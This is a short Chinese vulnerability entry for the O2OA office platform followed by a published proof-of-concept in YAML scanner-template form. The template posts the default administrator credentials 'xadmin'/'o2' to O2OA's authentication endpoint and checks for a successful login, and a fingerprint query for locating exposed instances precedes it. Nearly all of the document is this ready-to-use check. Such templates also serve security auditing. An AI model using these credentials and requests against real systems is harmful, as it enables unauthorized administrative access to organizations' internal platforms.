漏洞描述
O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。
title=="O2OA"
o2-default-password: O2OA 后台默认密码
PoC代码[已公开]
id: o2-default-password
info:
name: O2OA 后台默认密码
author: zan8in
severity: high
description: |
O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。
title=="O2OA"
rules:
r0:
request:
method: POST
path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.1&l7u46why
headers:
Authorization: anonymous
Content-Type: application/json; charset=UTF-8
body: |
{"credential":"xadmin","password":"o2"}
expression: response.status == 200 && response.body.bcontains(b'"type":') && response.body.bcontains(b'"success"')
expression: r0()